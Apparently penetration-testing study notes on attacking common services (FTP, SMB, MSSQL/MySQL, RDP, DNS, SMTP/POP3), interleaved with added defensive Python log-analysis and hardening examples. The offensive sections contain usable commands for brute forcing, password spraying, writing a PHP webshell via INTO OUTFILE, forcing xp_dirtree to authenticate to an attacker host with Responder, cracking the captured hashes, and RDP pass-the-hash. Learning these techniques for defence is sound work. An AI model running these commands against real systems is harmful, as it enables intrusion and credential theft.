Attacking Common Services (Just Do Formatting)
This section isn't so good; we can remove it or add more to it
File Transfer Protocol (FTP)
The File Transfer Protocol (FTP) is a standard network protocol used to transfer files between computers. It also supports directory and file operations, such as changing the working directory, listing files, and renaming and deleting directories or files.
Some of the common attacks on FTP:
Check if the FTP server allows anonymous logins
Bruteforcing the service: if we find a username that we know exists, we can use it to bruteforce the service, or we can even perform a password spray attack
FTP bounce attack, which is a network attack that uses FTP servers to deliver outbound traffic to another device on the network.
#Medusa bruteforce attack
medusa -u <Username> -P <Password-Word-List> -h <IP-Address> -M ftp
#Nmap bounce attack command
sudo nmap -Pn -v -n -p80 -b <Username>:<Password>@<FTP-Server-IP-Address> <Internal-Target-IP-Address>
Server Message Block (SMB)
Server Message Block (SMB) is a communication protocol created for providing shared access to files and printers across nodes on a network.
Tools like smbclient, smbmap, rpcclient, and enum4linux-ng can be used to interact with and test an SMB server.
Some of the common attacks on SMB:
Check if the SMB server allows anonymous (null session) authentication
Try bruteforcing or password spraying attacks
#Display a list of server shares (-N to use null session (anonymous))
smbclient -N -L //<IP-Address>
#Smbmap commands
smbmap -H <IP-Address> -R #List server shares (-R to perform recursive listing)
smbmap -H <IP-Address> --download "<File-Path>" #Download the file specified
smbmap -H <IP-Address> --upload <File-To-Upload> "<File-Path>" #Upload the local file to the specified share path
#Runs enum4linux-ng scans
enum4linux-ng.py <IP-Address> -A -C
#Password spraying an smb server using crackmapexec
crackmapexec smb <IP-Address> -u <User-List> -p '<Password>' --local-auth
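The two checks above (anonymous FTP access, and bruteforce or password-spray attempts against FTP and SMB) are exactly what a defender should be able to spot in authentication logs. The following Python example is added here and is not part of the original notes or of any of the tools listed. It assumes a hypothetical collector that has already normalised vsftpd and SMB authentication results into one line format (the sample lines are constructed) and flags anonymous FTP logins, repeated failures for one account from one source, and one source failing against many distinct accounts inside a five-minute window.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not from any real system). A hypothetical collector
# has normalised FTP (vsftpd) and SMB authentication results into one format:
# <ISO timestamp> <service> <source IP> <username> <OK|FAIL>
SAMPLE_LOG = """\
2024-05-01T10:00:01 ftp 203.0.113.5 anonymous OK
2024-05-01T10:00:05 ftp 198.51.100.7 admin FAIL
2024-05-01T10:00:06 ftp 198.51.100.7 admin FAIL
2024-05-01T10:00:07 ftp 198.51.100.7 admin FAIL
2024-05-01T10:00:08 ftp 198.51.100.7 admin FAIL
2024-05-01T10:00:09 ftp 198.51.100.7 admin FAIL
2024-05-01T10:00:10 ftp 198.51.100.7 admin FAIL
2024-05-01T10:01:00 smb 198.51.100.9 alice FAIL
2024-05-01T10:01:02 smb 198.51.100.9 bob FAIL
2024-05-01T10:01:04 smb 198.51.100.9 carol FAIL
2024-05-01T10:01:06 smb 198.51.100.9 dave FAIL
2024-05-01T10:01:08 smb 198.51.100.9 erin FAIL
2024-05-01T10:01:10 smb 198.51.100.9 frank OK
2024-05-01T10:05:00 smb 192.0.2.20 alice FAIL
2024-05-01T10:30:00 smb 192.0.2.20 alice OK
"""

LINE_RE = re.compile(r"^(\S+) (ftp|smb) (\S+) (\S+) (OK|FAIL)$")
WINDOW = timedelta(minutes=5)   # assumed detection window
BRUTE_THRESHOLD = 5             # failures for one (source, user) pair inside WINDOW
SPRAY_THRESHOLD = 5             # distinct users failing from one source inside WINDOW


def parse(log_text):
    """Turn the normalised lines into sorted (ts, service, src, user, ok) tuples."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip anything that does not fit the format
        ts, service, src, user, outcome = m.groups()
        events.append((datetime.fromisoformat(ts), service, src, user, outcome == "OK"))
    return sorted(events)


def max_in_window(stamps, window):
    """Largest number of (sorted) timestamps that fit inside one window."""
    best = start = 0
    for end, ts in enumerate(stamps):
        while ts - stamps[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def max_distinct_in_window(items, window):
    """items: sorted (ts, user) pairs. Largest distinct-user count inside one window."""
    best = start = 0
    seen = Counter()
    for ts, user in items:
        seen[user] += 1
        while ts - items[start][0] > window:
            old = items[start][1]
            seen[old] -= 1
            if seen[old] == 0:
                del seen[old]
            start += 1
        best = max(best, len(seen))
    return best


def analyse(log_text):
    """Return sorted (finding, source, detail) tuples for the three patterns."""
    findings = []
    per_pair = defaultdict(list)  # (src, user) -> failure timestamps
    per_src = defaultdict(list)   # src -> (ts, user) failures
    for ts, service, src, user, ok in parse(log_text):
        if service == "ftp" and ok and user.lower() in ("anonymous", "ftp"):
            findings.append(("anonymous-ftp-login", src, user))
        if not ok:
            per_pair[(src, user)].append(ts)
            per_src[src].append((ts, user))
    for (src, user), stamps in per_pair.items():
        n = max_in_window(stamps, WINDOW)
        if n >= BRUTE_THRESHOLD:
            findings.append(("brute-force", src, f"{user}: {n} failures"))
    for src, items in per_src.items():
        n = max_distinct_in_window(items, WINDOW)
        if n >= SPRAY_THRESHOLD:
            findings.append(("password-spray", src, f"{n} distinct users"))
    return sorted(findings)


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(*finding)
```

The thresholds and the window are assumptions to tune against a baseline; a spray that rotates source addresses will not trip the per-source rule, which is why account lockout policy and the anonymous-login check matter independently of this logic.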
SQL Databases
MySQL and Microsoft SQL Server (MSSQL) are relational database management systems that store data in tables, columns, and rows.
MSSQL supports two authentication modes, Windows authentication and SQL server authentication.
There are some default databases that contain information about the database itself.
MySQL default system schemas/databases:
mysql - is the system database that contains tables that store information required by the MySQL server
information_schema - provides access to database metadata
performance_schema - is a feature for monitoring MySQL Server execution at a low level
sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
MSSQL default system schemas/databases:
master - keeps the information for an instance of SQL Server.
msdb - used by SQL Server Agent.
model - a template database copied for each new database.
resource - a read-only database that keeps system objects visible in every database on the server in sys schema.
tempdb - keeps temporary objects for SQL queries.
We can use SQL databases for more than SQL queries; for example, we can write and read files, or we can access other linked databases
#To Connect to MSSql (windows-auth for windows authentication)
mssqlclient.py <Username>@<IP-Address> -windows-auth
#To read the tables in a database
SELECT * FROM <DB-Name>.INFORMATION_SCHEMA.TABLES
#MSSQL reading files (OPENROWSET with BULK):
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
#MySQL writing and reading files (INTO OUTFILE and LOAD_FILE need the FILE privilege and are limited by secure_file_priv):
mysql -h <IP-Address> -P <Port-Number> -u <Username>
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
SELECT LOAD_FILE("/etc/passwd");
#To capture the NetNTLMv2 hash of the account the MSSQL service runs as
sudo responder -I tun0 #Start a listener
EXEC master..xp_dirtree '\\<Your-IP-Address>\share\' #Make the server authenticate to the listener
hashcat -m 5600 <Hash-File> <Password-List> #To crack the captured NetNTLMv2 hash
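The file read/write statements and the xp_dirtree UNC trick above all leave a recognisable trace in a SQL audit or query log. The following Python example is added here; it is not from the original notes and not an existing tool. It runs a handful of pattern rules over a constructed audit trail in an assumed "<engine> <login>: <statement>" format and separates an xp_dirtree call with a UNC path (which makes the SQL Server service account authenticate to an outside host) from the same procedure called on a local path.

```python
import re

# Constructed sample of a SQL statement audit trail (not from a real server).
# Each line is "<engine> <login>: <statement>". A raw string keeps the UNC
# backslashes exactly as a server would log them.
SAMPLE_AUDIT = r"""
mysql web_app: SELECT id, name FROM users WHERE id = 42
mysql web_app: SELECT '...' INTO OUTFILE '/var/www/html/cmd.php'
mysql report_ro: SELECT LOAD_FILE("/etc/passwd")
mssql sa: SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
mssql svc_app: EXEC master..xp_dirtree '\\203.0.113.5\share\'
mssql svc_app: EXEC master..xp_dirtree 'C:\inetpub\logs'
mssql sa: SELECT * FROM sales.INFORMATION_SCHEMA.TABLES
"""

LINE_RE = re.compile(r"^(mysql|mssql) (\S+): (.*)$")

# (name, severity, pattern). Matching mitigations: MySQL secure_file_priv and no
# FILE privilege for application accounts; MSSQL xp_* procedures limited to
# sysadmin, and outbound SMB (TCP 445) egress-filtered from database hosts.
RULES = [
    ("file-write", "high", re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.I)),
    ("file-read", "high", re.compile(r"\bLOAD_FILE\s*\(|\bOPENROWSET\s*\(\s*BULK\b", re.I)),
    # a quoted UNC path ('\\host\...') makes the server authenticate outbound
    ("outbound-unc-path", "high", re.compile(r"'\\\\[\w.\-]+\\")),
    ("filesystem-procedure", "medium", re.compile(r"\bxp_(?:dirtree|fileexist|subdirs)\b", re.I)),
]


def audit(log_text):
    """Return (severity, rule, engine, login) for every statement a rule matches."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        engine, login, stmt = m.groups()
        for name, severity, rx in RULES:
            if rx.search(stmt):
                findings.append((severity, name, engine, login))
    return findings


def logins_by_severity(findings, severity):
    """Sorted, de-duplicated '<engine>/<login>' pairs with a finding at that severity."""
    return sorted({f"{eng}/{login}" for sev, _, eng, login in findings if sev == severity})


if __name__ == "__main__":
    results = audit(SAMPLE_AUDIT)
    for row in results:
        print(*row)
    print("high-severity logins:", logins_by_severity(results, "high"))
```

A local-path xp_dirtree call only rates medium here because directory listing by a privileged login can be legitimate; the UNC form is what produces the outbound authentication the responder/hashcat lines above rely on, so that is the one to alert on and to block at the network edge.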
Remote Desktop Protocol (RDP)
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft which provides a user with a graphical interface to connect to another computer over a network connection.
For RDP, we can try password spraying attacks using tools like hydra
On older versions (before Server 2019) we could have hijacked a session.
We can also perform a Pass The Hash (PtH) attack
#To connect to an RDP server
rdesktop -u <Username> -p <Password> <IP-Address>
#Pass the Hash command
xfreerdp /v:<IP-Address> /u:<Username> /pth:<Hash>
#For Pass the Hash over RDP to work, Restricted Admin mode must be enabled on the target (run this on the target as an administrator)
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Domain Name System (DNS)
Domain Name System (DNS) translates domain names (e.g., hackthebox.com) to numerical IP addresses (e.g., 104.17.42.72).
For DNS, general enumeration is worth doing, as it often opens up new attack vectors
We can also attempt a zone transfer attack
DNS spoofing can be used to redirect users to a malicious page crafted by the attacker.
Tools like subbrute and subfinder can be used to enumerate subdomains.
Subdomain takeover is another attack we can try: if there are DNS records that aren't maintained, we can take over those subdomains and then direct users to a malicious page or even conduct a phishing campaign
#Zone Transfer Attack commands from different tools
dig AXFR @<Name-Server> <Domain>
fierce --domain <Domain>
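The zone transfer and subdomain takeover points above both come down to DNS records that expose more than they should. The Python example below is added here and is not part of the original notes; it parses a constructed BIND-style zone fragment for a fictitious domain and reports CNAME records whose target no longer exists, either inside the zone or at an external host. Live resolution is replaced by a constructed set of names that answer (substitute a real lookup in practice). Restricting AXFR to the zone's secondaries (BIND allow-transfer) is the corresponding fix for the zone transfer point.

```python
import re

# Constructed BIND-style zone fragment for a fictitious domain (not real data).
# Third-party hosts use the reserved .example TLD.
SAMPLE_ZONE = """
$ORIGIN example.com.
@         IN A     192.0.2.1
www       IN A     192.0.2.10
shop      IN CNAME example-shop.storefront-host.example.
blog      IN CNAME old-blog.pages-host.example.   ; provider account was deleted
docs      IN CNAME www
legacy    IN CNAME intranet                       ; intranet record was removed
"""

# Constructed stand-in for live resolution: the external names that currently
# answer. In practice replace this with a real DNS lookup.
RESOLVABLE = {"example-shop.storefront-host.example."}

ORIGIN_RE = re.compile(r"^\$ORIGIN\s+(\S+)")
RR_RE = re.compile(r"^(\S+)\s+(?:\d+\s+)?IN\s+(A|AAAA|CNAME)\s+(\S+)", re.I)


def fqdn(name, origin):
    """Qualify a relative owner or target name against the current $ORIGIN."""
    if name == "@":
        return origin
    return name if name.endswith(".") else f"{name}.{origin}"


def parse_zone(text):
    """Return ({owner: (type, rdata)}, origin); comments after ';' are dropped."""
    origin = "."
    records = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        m = ORIGIN_RE.match(line)
        if m:
            origin = m.group(1)
            continue
        m = RR_RE.match(line)
        if not m:
            continue
        owner, rtype, rdata = m.groups()
        rtype = rtype.upper()
        if rtype == "CNAME":
            rdata = fqdn(rdata, origin)
        records[fqdn(owner, origin)] = (rtype, rdata)
    return records, origin


def dangling_cnames(text, resolves):
    """List (owner, target, reason) for CNAMEs whose target no longer exists.

    resolves(name) -> bool answers whether an external name currently resolves.
    """
    records, origin = parse_zone(text)
    findings = []
    for owner, (rtype, target) in sorted(records.items()):
        if rtype != "CNAME":
            continue
        in_zone = target == origin or target.endswith("." + origin)
        if in_zone:
            if target not in records:
                findings.append((owner, target, "in-zone target has no record"))
        elif not resolves(target):
            findings.append((owner, target, "external target does not resolve"))
    return findings


def audit_sample():
    """Run the check over the constructed zone with the constructed resolver."""
    return dangling_cnames(SAMPLE_ZONE, RESOLVABLE.__contains__)


if __name__ == "__main__":
    for owner, target, reason in audit_sample():
        print(f"{owner} -> {target}: {reason}")
```

A record that no longer resolves is the precondition for the takeover described above, so the fix is to delete or re-point the stale CNAME before anyone else can claim the target name at the provider.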
Email Services
A mail server (sometimes also referred to as an email server) is a server that handles and delivers email over a network, usually over the Internet.
We can use the Mail eXchanger (MX) DNS record to identify a mail server.
We can use several commands to enumerate users on an SMTP server
After identifying valid users we can use tools like hydra to run bruteforce or password spray attacks against them.
#Commands to enumerate users using an SMTP server
telnet <IP-Address> 25 #Connect to SMTP
VRFY <Username>
EXPN <Username-Or-Email-Group>
MAIL FROM:<Email-Address>
RCPT TO:<Username>
#Commands for POP3 server
telnet <IP-Address> 110 #Connect to the POP3 server
USER <Username> #Can be used to enumerate and log in
PASS <Password> #If you need to login
LIST #List the emails
RETR <Email-ID> #Read the email
#smtp-user-enum command
smtp-user-enum -M <Module-Name> -U <Username-WordList> -D <Domain-Name> -t <IP-Address>
#Hydra bruteforce command
hydra -l <Email-Address> -P <Password-Wordlist> pop3://<IP-Address> -t 10
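The VRFY, EXPN and RCPT TO exchange above works because the server answers differently for existing and non-existing users. The Python example below is added here and is not from the original notes or from any real mail server; it models both sides of that exchange with a constructed user directory, first as a server that confirms every name and then with the usual mitigations (VRFY answering 252 for everyone, EXPN disabled, MAIL FROM required before RCPT TO, and the session dropped after a few unknown recipients), so the two transcripts can be compared. The reply codes follow RFC 5321 conventions; the domain and user names are constructed.

```python
# Constructed directory of local mailboxes and expansion lists (not a real system).
KNOWN_USERS = {"alice", "bob"}
GROUPS = {"staff": ["alice", "bob"]}


def _local_part(arg):
    """'TO:<bob@example.com>' or 'bob' -> 'bob'."""
    addr = arg.split(":", 1)[1] if ":" in arg else arg
    return addr.strip().strip("<>").split("@")[0].lower()


class SmtpResponder:
    """Model of how a server answers VRFY, EXPN, MAIL FROM and RCPT TO.

    hardened=False confirms or denies every name (the behaviour enumeration relies on).
    hardened=True applies common mitigations: VRFY/EXPN disabled, MAIL FROM required
    before RCPT TO, and the session dropped after `reject_limit` unknown recipients.
    """

    def __init__(self, users, groups, hardened, reject_limit=3):
        self.users = {u.lower() for u in users}
        self.groups = groups
        self.hardened = hardened
        self.reject_limit = reject_limit   # assumed per-session limit
        self.unknown_rcpts = 0
        self.sender_set = False

    def handle(self, line):
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "VRFY":
            if self.hardened:
                return "252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery"
            name = _local_part(arg)
            return f"250 2.1.5 {name}@example.com" if name in self.users else "550 5.1.1 User unknown"
        if verb == "EXPN":
            if self.hardened:
                return "502 5.5.1 EXPN not implemented"
            members = self.groups.get(_local_part(arg))
            return "250 " + ", ".join(members) if members else "550 5.1.1 List unknown"
        if verb == "MAIL":
            self.sender_set = True
            return "250 2.1.0 Ok"
        if verb == "RCPT":
            if self.hardened and not self.sender_set:
                return "503 5.5.1 Error: need MAIL command"
            if _local_part(arg) in self.users:
                return "250 2.1.5 Ok"
            self.unknown_rcpts += 1
            if self.hardened and self.unknown_rcpts >= self.reject_limit:
                return "421 4.7.0 Too many invalid recipients; closing connection"
            return "550 5.1.1 Recipient address rejected: User unknown"
        return "500 5.5.2 Command not recognized"


def run_session(hardened, commands):
    """Replay a client command list and return [(command, reply), ...]."""
    server = SmtpResponder(KNOWN_USERS, GROUPS, hardened)
    return [(cmd, server.handle(cmd)) for cmd in commands]


def leaks_existence(hardened):
    """True when VRFY answers differently for an existing and a non-existing user."""
    server = SmtpResponder(KNOWN_USERS, GROUPS, hardened)
    return server.handle("VRFY alice")[:3] != server.handle("VRFY mallory")[:3]


if __name__ == "__main__":
    probe = ["VRFY alice", "VRFY mallory", "EXPN staff", "MAIL FROM:<probe@example.net>",
             "RCPT TO:<alice@example.com>", "RCPT TO:<mallory@example.com>",
             "RCPT TO:<zed@example.com>", "RCPT TO:<quux@example.com>"]
    for hardened in (False, True):
        print(f"--- hardened={hardened}")
        for cmd, reply in run_session(hardened, probe):
            print(f"C: {cmd}\nS: {reply}")
```

Even the hardened server still answers 550 to an unknown RCPT TO, because accepting and later bouncing mail would cause backscatter; what makes enumeration through RCPT TO expensive on a real MTA is the per-session limit modelled here together with connection rate limiting, and the smtp-user-enum and hydra runs above are what those limits are meant to slow down.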